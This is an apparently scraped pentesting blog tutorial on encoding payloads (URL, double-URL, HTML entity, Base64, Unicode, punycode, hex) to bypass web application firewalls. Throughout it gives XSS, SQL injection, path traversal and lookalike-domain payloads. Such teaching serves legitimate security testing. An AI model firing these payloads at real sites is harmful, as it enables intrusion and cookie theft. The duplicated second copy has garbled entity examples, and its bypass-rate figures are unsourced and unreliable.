Encoding is one of the most important concepts in web security testing. Understanding how different encoding schemes work — and how applications decode them — lets you bypass input filters, WAFs, and sanitization routines. This guide covers every major encoding technique with practical examples for penetration testing.

Why Encoding Matters in Security Testing

Encoding Bypass Effectiveness vs Common WAFs (%)

URL Encoding (%XX)52%

Double URL Encoding (%25XX)71%

HTML Entity Encoding65%

Unicode (\uXXXX)58%

Base64 (with eval)44%

Hex (0x + hex)48%

Mixed Case39%

Null byte injection33%

Encoding Techniques Cheat Sheet

Encoding Tool Bypass Context WAFs Affected Example

URL encoding Burp Decoder URL parameters ModSecurity %3Cscript%3E for <script>

Double URL Burp / manual Double-decoded apps Nginx-based WAFs %253Cscript%253E

HTML entity Manual HTML contexts Signature-based <script>

Unicode escape

Manual / Cyberchef

JSON/JS contexts

Regex-based

Every layer of a web application may decode input differently. A WAF might decode URL encoding once before matching signatures, while the backend application decodes twice. This disparity creates bypass opportunities: encode your payload in a way the WAF doesn't decode, but the application does.

The Encoding Pipeline lets you chain multiple encoding layers and preview how each stage transforms your payload — essential for complex multi-layer bypass attempts.

URL Encoding

URL encoding replaces unsafe characters with %HH hex notation. Single encoding is standard; double encoding exploits applications that decode twice.

# Single URL encoding
<script>  →  %3Cscript%3E
/etc/passwd  →  %2Fetc%2Fpasswd
' (single quote)  →  %27
SPACE  →  %20 or +

# Double URL encoding — bypass WAFs that decode once
%3Cscript%3E  →  %253Cscript%253E
%27  →  %2527

# Selective encoding — encode just the dangerous chars
<script>alert(1)</script>  →  %3Cscript>alert(1)%3C/script>

The %25 Trick

Encode the percent sign itself (% → %25) to produce double-encoded sequences:

%25 = % (after first decode)
%2527 = %27 = ' (after second decode)

# Exploit: WAF sees %2527 (no dangerous chars), app decodes to '
?id=1%2527 AND 1=1--

HTML Entity Encoding

HTML entity encoding converts characters to their named or numeric HTML equivalents. Browsers decode these before executing code, which means properly placed entities can bypass filters that look for literal characters:

# Named entities
<  →  &lt;     (or &LT; — case insensitive)
>  →  &gt;
"  →  &quot;
'  →  &apos; or &#39;
&  →  &amp;

# Decimal numeric entities
<  →  &#60;
>  →  &#62;
"  →  &#34;

# Hex numeric entities
<  →  &#x3C; or &#x3c; (case insensitive)
s  →  &#x73;

# XSS bypass using entities in event handlers
<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)>
# Browser decodes &#x61; to 'a', &#x6C; to 'l', etc → alert(1)

Base64 in JavaScript

Base64 is used to obfuscate payloads in JavaScript contexts. The browser provides atob() (Base64 decode) and btoa() (Base64 encode) natively:

# Encode a payload
btoa("alert(document.cookie)")
# Returns: "YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="

# Execute via eval
eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))

# DOM XSS via Base64
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>

# In data URIs
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click</a>

Unicode Normalization Attacks

Unicode normalization converts "equivalent" characters to their canonical forms. Applications that normalize after filtering can be bypassed using Unicode lookalike characters:

# Fullwidth characters (Unicode block U+FF01–U+FF60)
＜script＞alert(1)＜/script＞
# ＜ = U+FF1C (FULLWIDTH LESS-THAN SIGN)
# After NFC normalization in some frameworks: <script>alert(1)</script>

# Unicode normalization bypass for path traversal
..%c0%af  →  ../  (overlong UTF-8 encoding)
..%ef%bc%8f  →  ../  (Unicode fullwidth solidus U+FF0F)

# Case folding bypass
ſ (U+017F, Latin Small Letter Long S) normalizes to 's' in some contexts
ᴀ (U+1D00) normalizes to 'a'

Punycode for Domain Bypass

Punycode encodes internationalized domain names (IDN) into ASCII. This is exploitable for URL allow-list bypass and phishing:

# Punycode encoding
xn--e1awd7f.com  (encodes to a Cyrillic lookalike of "paypal.com")
xn--pple-43d.com  (lookalike of "apple.com")

# In SSRF filters that allow-list based on domain suffix
http://[email protected]/  (parser confusion)

Hex Encoding

# MySQL hex encoding for SQLi filter bypass
SELECT 0x61646d696e  # decodes to "admin"
WHERE username=0x61646d696e

# In SQLi payloads — bypass quote filters
' UNION SELECT 0x61646d696e,0x70617373776f7264--
# Equivalent to: UNION SELECT 'admin','password'

# Hex in URLs (same as URL encoding)
%61 = a, %62 = b ... %7A = z

Multi-Layer Encoding Chains

Chaining encoding layers exploits differential decoding between security controls and application logic:

# Layer 1: HTML encode the XSS payload
<script>alert(1)</script>
→ &lt;script&gt;alert(1)&lt;/script&gt;

# Layer 2: URL encode the HTML entities
→ %26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B

# Scenario: WAF checks URL-decoded value (sees HTML entities — no script tag)
# Application HTML-decodes the entities, revealing <script> tags
# Result: WAF bypassed, XSS executed

Build and test these chains in the Encoding Pipeline — it supports stacking URL, HTML, Base64, hex, and Unicode transforms with a live preview of each layer's output.

Encoding for Different Contexts

The correct encoding depends entirely on where the payload lands:

URL parameter context — URL-encode special characters. Double-encode if the WAF single-decodes.
HTML attribute context — HTML entity encoding. " to break out of double-quoted attributes.
JavaScript string context — JavaScript Unicode escapes: \u003cscript\u003e or hex escapes \x3cscript\x3e.
JSON string context — Unicode escapes are decoded by JSON parsers: \u0022 for double quote.
CSS context — CSS hex escapes: \003C for <.

The WAF Evasion Studio tests encoding bypass strategies automatically against common WAF signature sets, and the XSS Cheat Sheet has context-specific encoded payloads ready to copy.

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

XSS Payloads: The Ultimate Guide for Penetration Testers (2025)

12 min read

Reverse Shell Cheat Sheet: 30+ One-Liners for Every Language (2025)

10 min read

JWT Attacks: A Pentester's Guide to Algorithm Confusion and Token Manipulation

9 min read

$loading...

Back to blog

Payload Encoding Techniques: URL, HTML, Base64, and Unicode for WAF Bypass

September 22, 202511 min read

EncodingWAF BypassXSSPenetration Testing

Why Encoding Matters in Security Testing

Encoding Bypass Effectiveness vs Common WAFs (%)

URL Encoding (%XX)52%

Double URL Encoding (%25XX)71%

HTML Entity Encoding65%

Unicode (\uXXXX)58%

Base64 (with eval)44%

Hex (0x + hex)48%

Mixed Case39%

Null byte injection33%

Encoding Techniques Cheat Sheet

Encoding	Tool	Bypass Context	WAFs Affected	Example
URL encoding	Burp Decoder	URL parameters	ModSecurity	%3Cscript%3E for <script>
Double URL	Burp / manual	Double-decoded apps	Nginx-based WAFs	%253Cscript%253E
HTML entity	Manual	HTML contexts	Signature-based	<script>
Unicode escape	Manual / Cyberchef	JSON/JS contexts	Regex-based	Every layer of a web application may decode input differently. A WAF might decode URL encoding once before matching signatures, while the backend application decodes twice. This disparity creates bypass opportunities: encode your payload in a way the WAF doesn't decode, but the application does. The Encoding Pipeline lets you chain multiple encoding layers and preview how each stage transforms your payload — essential for complex multi-layer bypass attempts. URL Encoding URL encoding replaces unsafe characters with `%HH` hex notation. Single encoding is standard; double encoding exploits applications that decode twice. `# Single URL encoding <script> → %3Cscript%3E /etc/passwd → %2Fetc%2Fpasswd ' (single quote) → %27 SPACE → %20 or + # Double URL encoding — bypass WAFs that decode once %3Cscript%3E → %253Cscript%253E %27 → %2527 # Selective encoding — encode just the dangerous chars <script>alert(1)</script> → %3Cscript>alert(1)%3C/script>` The %25 Trick Encode the percent sign itself (`%` → `%25`) to produce double-encoded sequences: `%25 = % (after first decode) %2527 = %27 = ' (after second decode) # Exploit: WAF sees %2527 (no dangerous chars), app decodes to ' ?id=1%2527 AND 1=1--` HTML Entity Encoding HTML entity encoding converts characters to their named or numeric HTML equivalents. Browsers decode these before executing code, which means properly placed entities can bypass filters that look for literal characters: `# Named entities < → < (or &LT; — case insensitive) > → > " → " ' → ' or ' & → & # Decimal numeric entities < → < > → > " → " # Hex numeric entities < → < or < (case insensitive) s → s # XSS bypass using entities in event handlers <img src=x onerror=alert(1)> # Browser decodes a to 'a', l to 'l', etc → alert(1)` Base64 in JavaScript Base64 is used to obfuscate payloads in JavaScript contexts. The browser provides `atob()` (Base64 decode) and `btoa()` (Base64 encode) natively: `# Encode a payload btoa("alert(document.cookie)") # Returns: "YWxlcnQoZG9jdW1lbnQuY29va2llKQ==" # Execute via eval eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ==")) # DOM XSS via Base64 <img src=x onerror=eval(atob('YWxlcnQoMSk='))> # In data URIs <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click</a>` Unicode Normalization Attacks Unicode normalization converts "equivalent" characters to their canonical forms. Applications that normalize after filtering can be bypassed using Unicode lookalike characters: `# Fullwidth characters (Unicode block U+FF01–U+FF60) ＜script＞alert(1)＜/script＞ # ＜ = U+FF1C (FULLWIDTH LESS-THAN SIGN) # After NFC normalization in some frameworks: <script>alert(1)</script> # Unicode normalization bypass for path traversal ..%c0%af → ../ (overlong UTF-8 encoding) ..%ef%bc%8f → ../ (Unicode fullwidth solidus U+FF0F) # Case folding bypass ſ (U+017F, Latin Small Letter Long S) normalizes to 's' in some contexts ᴀ (U+1D00) normalizes to 'a'` Punycode for Domain Bypass Punycode encodes internationalized domain names (IDN) into ASCII. This is exploitable for URL allow-list bypass and phishing: `# Punycode encoding xn--e1awd7f.com (encodes to a Cyrillic lookalike of "paypal.com") xn--pple-43d.com (lookalike of "apple.com") # In SSRF filters that allow-list based on domain suffix http://[email protected]/ (parser confusion)` Hex Encoding `# MySQL hex encoding for SQLi filter bypass SELECT 0x61646d696e # decodes to "admin" WHERE username=0x61646d696e # In SQLi payloads — bypass quote filters ' UNION SELECT 0x61646d696e,0x70617373776f7264-- # Equivalent to: UNION SELECT 'admin','password' # Hex in URLs (same as URL encoding) %61 = a, %62 = b ... %7A = z` Multi-Layer Encoding Chains Chaining encoding layers exploits differential decoding between security controls and application logic: `# Layer 1: HTML encode the XSS payload <script>alert(1)</script> → <script>alert(1)</script> # Layer 2: URL encode the HTML entities → %26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B # Scenario: WAF checks URL-decoded value (sees HTML entities — no script tag) # Application HTML-decodes the entities, revealing <script> tags # Result: WAF bypassed, XSS executed` Build and test these chains in the Encoding Pipeline — it supports stacking URL, HTML, Base64, hex, and Unicode transforms with a live preview of each layer's output. Encoding for Different Contexts The correct encoding depends entirely on where the payload lands: URL parameter context — URL-encode special characters. Double-encode if the WAF single-decodes. HTML attribute context — HTML entity encoding. `"` to break out of double-quoted attributes. JavaScript string context — JavaScript Unicode escapes: `\u003cscript\u003e` or hex escapes `\x3cscript\x3e`. JSON string context — Unicode escapes are decoded by JSON parsers: `\u0022` for double quote. CSS context — CSS hex escapes: `\003C` for `<`. The WAF Evasion Studio tests encoding bypass strategies automatically against common WAF signature sets, and the XSS Cheat Sheet has context-specific encoded payloads ready to copy. ShareX LinkedIn Reddit Level up your security testing Install the CLI `npx payload-playground` Explore All Tools Encoding, hashing, JWT & more Browse Cheat Sheets Quick-reference payload guides Related Articles XSS Payloads: The Ultimate Guide for Penetration Testers (2025) 12 min read Reverse Shell Cheat Sheet: 30+ One-Liners for Every Language (2025) 10 min read JWT Attacks: A Pentester's Guide to Algorithm Confusion and Token Manipulation 9 min read Payload Encoding Techniques: URL, HTML, Base64, and Unicode for WAF Bypass \| Payload Playground

Payload Encoding Techniques: URL, HTML, Base64, and Unicode for WAF Bypass

Why Encoding Matters in Security Testing

Encoding Bypass Effectiveness vs Common WAFs (%)

Encoding Techniques Cheat Sheet

URL Encoding

The %25 Trick

HTML Entity Encoding

Base64 in JavaScript

Unicode Normalization Attacks

Punycode for Domain Bypass

Hex Encoding

Multi-Layer Encoding Chains

Encoding for Different Contexts

Related Articles

Payload Encoding Techniques: URL, HTML, Base64, and Unicode for WAF Bypass

Why Encoding Matters in Security Testing

Encoding Bypass Effectiveness vs Common WAFs (%)

Encoding Techniques Cheat Sheet

URL Encoding

The %25 Trick

HTML Entity Encoding

Base64 in JavaScript

Unicode Normalization Attacks

Punycode for Domain Bypass

Hex Encoding

Multi-Layer Encoding Chains

Encoding for Different Contexts

Related Articles